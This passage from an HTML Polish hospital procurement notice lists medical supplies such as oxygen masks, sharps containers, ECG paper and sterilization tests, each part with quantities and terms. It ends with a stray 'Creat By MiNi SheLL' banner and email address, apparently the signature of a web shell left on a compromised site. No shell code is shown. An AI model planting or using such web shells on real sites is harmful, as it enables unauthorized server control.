28.Fartuch foliowy bez rękawów, zawiązywany, jednorazowego użytku, pakowany jednostkowo-80 000 sztuk;
29.Słój do dobowej zbiórki moczu z pokrywką-160 sztuk;
30.Kaczka plastikowa męska, zamykana-30 sztuk;
31.Basen plastikowy z pokrywką-30 sztuk;
32.Stazy, wykonane z materiału umożliwiającego jego pełną dezynfekcję, z regulacją długości, o długości minimum 50cm-600 sztuk;
33.Żel do USG 0,5litra-900 sztuk;
34.Żel do EKG 0,5litra-80 sztuk;
35.Cewnik do podawania tlenu, przez nos, prosty, z długością wąsów - 2 cm	-
12 000 sztuk;
36.Nakłuwacze do pobierania krwi z naczyń włosowatych, sterylne jednorazowego użytku, głębokość nakłucia 1,8mm-16 000 sztuk;
37.Dren do podawania tlenu dł. 2,1 m z końcówką okrągłą i gwiazdkową - zamawiane w zależności od potrzeb-200 sztuk;
38.Maska do podawania tlenu z drenem dł. 2,1 m dla dorosłych i dla dzieci-1 000 sztuk;
39.Maska do podawania tlenu z rezerwuarem i drenem dł. 2,1 m dla dorosłych i dla dzieci-500 sztuk;
40.Maska do nebulizacji z drenem tlenowym-300 sztuk;
41.Przedłużacz do pomp infuzyjnych 1,5m bezbarwny, jałowy niepirogenny, nietoksyczny, typu Luer-20 000 sztuk;
42.Przedłużacz do pomp infuzyjnych 1,5m do podawania leków światłoczułych, jałowy niepirogenny, nietoksyczny, typu Luer-9 000 sztuk;
43.Strzykawka z pompką (gruszką gumową do odsysania) (strzykawka z gruszką zamiast tłoka do płukania i przemywania, opakowanie zawierające max 50 szt., podziałka do 60ml, złącze cewnikowe, możliwość obsługi jedną ręką, płaskie gruszki umożliwiające postawienie, nie zawiera latexu)-600 sztuk ;	
44.Termometry bezrtęciowe, lekarskie, elektroniczne (pomiar temperatury pod pachą, w jamie ustnej, odbycie; czas pomiaru do 30 sekund, dezynfekcja poprzez zanurzenie (wodoodporny),wymienna bateria, wodoszczelna obudowa chroniąca przez rozbiciem, pamięć ostatniego pomiaru, sygnał dźwiękowy o gotowości i zakończeniu pomiaru)- 1 200 sztuk ;	
45.Promiennik TUV 30W, czas pracy 8000h do lamp bakteriobójczych przepływowch i nieprzepływowych-30 sztuk;
46.Szpatułki drewniane jałowe (pakowane po 100 sztuk)-240 opakowań;
47.Regulator grawitacyjny do precyzyjnej infuzji (przyrząd do precyzyjnego podawania płynów infuzyjnych i lipidów z regulacją prędkości przepływu w zakresie 2ml/h - 350ml/h ( dla płynów infuzyjnych), z podwójną skalą: w mm/h oraz literową z możliwością podłączenia zestawu kroplowego jednoznacznie zaznaczoną pozycją wyłączenia/ zamknięcia przepływu i naniesionym znacznikiem kierunku zwiększania/zmniejszania nastawy wyposażony w przezierne dreny odporne na zamknięcie światła i przeciekanie, o dł. 9-27cm, zakończone łącznikami typu luer lock (męskim i żeńskim) z koreczkami ochronnymi posiadający wyprofilowany uchwyt gwarantujący pewne trzymanie regulatora z dokładnymi danymi producenta produktu na opakowaniu z obrazkową instrukcją podłączenia regulatora w języku polskim dołączoną do produktu)-2 000 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8, 33.14.10.00-9, 33.19.40.00-6, 33.14.16.15-4, 33.14.14.11-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dreny do ssaka, zestawy do przetoczeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dren do ssaka z końcówką męsko-żeńską, jałowy Ch 24, dł. 210mm-3 000 sztuk;
2.Dren do ssaka z końcówką żeńsko-żeńską, jałowy Ch 24, dł. 210mm-3 000 sztuk;
3.Zestaw do przetoczeń płynów światłoczułych z osłoną na butelkę (aparat do kroplówek + osłona na leki światłoczułe)-600 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8, 33.19.40.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pojemnik na materiał skażony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pojemnik na materiał skażony wykonany z polipropylenu 1 litrowy. Pojemnik musi posiadać konstrukcję zamknięcia uniemożliwiającą jego otwarcie i ponowne użycie.-800 sztuk;
2.Pojemnik na materiał skażony wykonany z polipropylenu 2 litrowy. Pojemnik musi posiadać konstrukcję zamknięcia uniemożliwiającą jego otwarcie i ponowne użycie.-25 000 sztuk;
3.Pojemnik na materiał skażony wykonany z polipropylenu 5 litrowy. Pojemnik musi posiadać konstrukcję zamknięcia uniemożliwiającą jego otwarcie i ponowne użycie.-8 000 sztuk;
4.Pojemnik na materiał skażony wykonany z polipropylenu 10 litrowy. Pojemnik musi posiadać konstrukcję zamknięcia uniemożliwiającą jego otwarcie i ponowne użycie.-18 000 sztuk;
5.Pojemnik na materiał skażony wykonany z polipropylenu 20 litrowy. Pojemnik musi posiadać konstrukcję zamknięcia uniemożliwiającą jego otwarcie i ponowne użycie.-12 000 sztuk;
6.Pojemnik na materiał skażony wykonany z polipropylenu 60 litrowy. Pojemnik musi posiadać konstrukcję zamknięcia uniemożliwiającą jego otwarcie i ponowne użycie.-60 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.92.84.80-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Linia do ogrzewania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Linia DI-50 lub równoważna do ogrzewania do aparatu Level-1, model H-1025-50 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Rurki ustno-gardłowe, tasiemki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rurka ustno-gardłowa jednorazowego użytku z otwartym kanałem do odsysania, przeciwzagryzakiem i mocowaniem do rurki intubacyjnej, z tasiemką do mocowania  wykonaną z pianki poliuretanowj; rozmiar nr 2, oznaczona kolorem-800 sztuk;
2.Rurka ustno-gardłowa jednorazowego użytku z otwartym kanałem do odsysania, przeciwzagryzakiem i mocowaniem do rurki intubacyjnej, z tasiemką do mocowania wykonaną z pianki poliuretanowj; rozmiar nr 3, oznaczona kolorem-1 300 sztuk;
3.Tasiemka do mocowania rurki intubacyjnej, wykonana z pianki poliuretanowej, z mocowaniem na rzepy pozwalającym regulować długość, poszerzona w części karkowej, długość 470mm-800 sztuk;
4.Tasiemka do mocowania rurki tracheostomijnej, wykonana z pianki poliuretanowej, z mocowaniem na rzepy pozwalającym regulować długość, poszerzona w części karkowej, długość 470mm-1 300 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Ogrzewacze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ogrzewacze (ocieplacz) górnych części ciała (koce do użytku jednego pacjenta;
wykonane z tkaniny niezawierającej lateksu, wierzchnia warstwa wodoodporna, materiał radioprzezierny, bez konieczności usuwania koca z ciała pacjenta przy wykonywaniu badań obrazowych Rtg, materiał dwuwarstwowy, perforowany umożliwiający równomierny przepływ powietrza; koce współpracujące z urządzeniami: Warm Touch i Thermacare, bez konieczności zakupu dodatkowego osprzętu podłączeniowego; minimalne wymiary 210cm x 70cm) -120 sztuk;
2.Ogrzewacze (ocieplacz) dolnych części ciała (koce do użytku jednego pacjenta;
wykonane z tkaniny niezawierającej lateksu, wierzchnia warstwa wodoodporna, materiał radioprzezierny, bez konieczności usuwania koca z ciała pacjenta przy wykonywaniu badań obrazowych Rtg, materiał dwuwarstwowy, perforowany umożliwiający równomierny przepływ powietrza; koce współpracujące z urządzeniami: Warm Touch i Thermacare bez konieczności zakupu dodatkowego osprzętu podłączeniowego; minimalne wymiary 140cm x 100cm-120 sztuk;
3.Wapno absorbowane, granulowane z indykatorem barwnym do aparatu do znieczuleń-pojemność  opakowania  5l; średni przekrój granulatu 3-5 mm; zdolność absorbcji CO2 w aparatach do znieczuleń i respiratorach-80 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 24.21.30.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Papiery rejestrujące do urządzeń medycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Papier do EKG termoczuły, z nadrukiem, 110 mm x 40 m	-140 rolek;
2.Papier do EKG termoczuły, z nadrukiem, 104 mm x 40 m	-400 rolek;
3.Papier do EKG termoczuły, z nadrukiem, 112 mm x 25 m	-1 600 rolek;
4.Papier do EKG termoczuły, z nadrukiem, 58mm x 25 m-60 rolek;
5.Papier do autokeratorefraktometru Zeiss, bez nadruku, 60mm x 25m-130 rolek;
6.Papier do videoprintera Sony UPP 110 HD /oryginalny/-300 rolek;
7.Papier do videoprintera Sony UPP210 HD /oryginalny/-80 rolek;
8.Papier do videoprintera Mitsubischi K-65HM /oryginalny/-36 rolek;
9.Papier do videoprintera Mitsubischi K-61B /oryginalny/-12 rolek;
10.Papier EKG do defibrylatora firmy INNOMED, bez nadruku, 50 mm x 25 m -100 rolek;
11.Papier do defibrylatora Lifepak 12, z nadrukiem-25 rolek;
12.Papier termiczny do rejestratora centrali monitorującej HYPERVISOR III,  bez nadruku, szer. 50 mm x dł.25m -9 rolek;
13.Papier do defibrylatora TEMED DMRS 251, z nadrukiem, 50 mm x 30 m-8 rolek;
14.Papier do rejestratora do centrali monitorującej, termiczny, bez nadruku, 50 mm x 20 m -10 rolek;
15.Papier do defibrylatora MEDIC-5 seria 30740 termoczuły, z nadrukiem, 
50 mm x 50 m-9 rolek;
16.Papier do defibrylatora Cardio-Aid 200B, bez nadruku, 58 mm x18 m-10 rolek;
17.Papier do defibrylatora Lifepak 10, z nadrukiem, 50 mm x 30 m -12 rolek;
18.Papier do aparatu Schiller AT-1, 90 mm x 90 mm x 400 kart-48 bloczków;
19.Papier do programatora St. Jude Medical, 210 mm x 140 mm x 250 kart-24 bloczki;
20.Papier do uroflowmetru, bez nadruku, szer. 112mm x 25 m -12 rolek;
21.Papier EKG SCHILLER AT-2 PLUS, 210 mm x 280 mm x 240 kart-10 bloczków;
22.Papier do Cardiofax, 144 mm x 60 m-60 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Papier rejestrujący do urządzeń medycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Papier do drukarki sterylizatora gazowego STERI-VAC 3 1/8in x 100ft, 79mm x 30m-18 rolek;
2.Papier do myjni-dezynfektora WD 230  57mmx55mmx12mm-20 sztuk;
3.Papier do drukarki inkubatora testów biologicznych Smart-Well  57mmx55mmx12mm-10 sztuk;
4.Papier do drukarki sterylizatora parowego TUITTNAUER 3870 EMS, rolka termiczna  57mmx25mb-10 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Wskaźniki sterylizacji, testy, taśmy do sterylizacji, etykiety, papier krepowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wskaźnik sterylizacji parowej kl. 4-1000 sztuk;
2.Wskaźnik sterylizacji parowej kl. 5, wskaźnik integracyjny z przesuwalną substancją wskaźnikową-500 sztuk;
3.Pakiet testowy Bowie-Dicka jednorazowego użytku-350 sztuk;
4.Wskaźnik sterylizacji  tlenek etylenu kl. 4-4000 sztuk;
5.Taśmy do sterylizacji o szerokości 25mm bez testu, dł. 50m
(taśma wzmocniona w dowolnym kolorze)-10 rolek;
6.Taśmy do sterylizacji o szerokości 25mm z testem na parę, dł. 50m-5 rolek;
7.Test kontroli wsadu sterylizacji parowej integrator + aplikator a 400 sztuk-2 opakowania;
8.Test kontroli wsadu sterylizacji gazowej integrator + aplikator a 100 sztuk-8 opakowań;
9.Test kontroli mycia w myjkach maszynowych a 12 sztuk-4 opakowania;
10.Test kontroli mycia w myjce ultradźwiękowej a 30 sztuk-1 opakowanie;
11.Test kontroli poprawnej pracy zgrzewarek a 250 sztuk	-2 opakowania;
12.Test Sporal S a 40 krążków-3 opakowania;
13.Test Sporal A a 10 testów-12 opakowań;
14.Test biologiczny para o szybkim odczycie-400 sztuk;
15.Test biologiczny tlenek etylenu o szybkim odczycie-1000 sztuk;
16.Wskaźniki weryfikujące cykl dezynfekcji termicznej w myjkach maszynowych (parametry: 93° - 10 min.)-1200 sztuk;
17.Etykiety do kontenerów(etykiety do kontenera ze wskaźnikiem klasy A;szpital posiada kontenery firmy Wagner)-500 sztuk;
18.Etykiety z plombą do kontenerów (etykieta wraz z plombą zabezpieczającą przed otwarciem; szpital posiada kontenery firmy Aesculap)-500 sztuk;
19.Papier krepowy do sterylizacji parowej i gazowej, wzmacniany technologicznie, 120cmx120cm, w arkuszach, zielony, pakowany a 125 arkuszy-2 opakowania;
20.Papier krepowy do sterylizacji parowej i gazowej, wzmacniany technologicznie, 120cmx120cm, w arkuszach, niebieski, pakowany a 125 arkuszy-2 opakowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Test.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Suchy test ureazowy-1 200 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Rękawy papierowo-foliowe gładkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rękaw papierowo-foliowy gładki o gramaturze 60-70g/m2, długości 200mb, szerokości 50mm +/- 10mm-15 rolek;
2.Rękaw papierowo-foliowy gładki o gramaturze 60-70g/m2, długości 200mb, szerokości 75mm +/- 10mm-10 rolek;
3.Rękaw papierowo-foliowy gładki o gramaturze 60-70g/m2, długości 200mb, szerokości 100mm +/- 10mm	- 25 rolek;
4.Rękaw papierowo-foliowy gładki o gramaturze 60-70g/m2, długości 200mb, szerokości 150mm +/- 15mm	- 30 rolek;
5.Rękaw papierowo-foliowy gładki o gramaturze 60-70g/m2, długości 200mb, szerokości 200mm +/- 15mm	-25 rolek;
6.Rękaw papierowo-foliowy gładki o gramaturze 60-70g/m2, długości 200mb, szerokości 250mm +/- 15mm	- 15 rolek;
7.Rękaw papierowo-foliowy gładki o gramaturze 60-70g/m2, długości 200mb, szerokości 300mm +/- 15mm	- 10 rolek;
8.Rękaw papierowo-foliowy gładki o gramaturze 60-70g/m2, długości 200mb, szerokości 400mm +/- 30mm	-10 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Szczoteczki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Szczoteczka do chirurgicznego mycia rąk (szczotka posiadająca z jednej strony suchą gąbkę, a z drugiej szczecinę wykonaną z miękkiego polietylenu o równej wysokości na całej powierzchni; z pilniczkiem do czyszczenia paznokci, nie uszkadzająca naskórka dzięki specjalnemu systemowi miękkich włosków;
posiadająca sterylne i wygodne opakowanie, łatwe do otwierania;
nie powodująca podrażnień alergicznych)-20 000 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com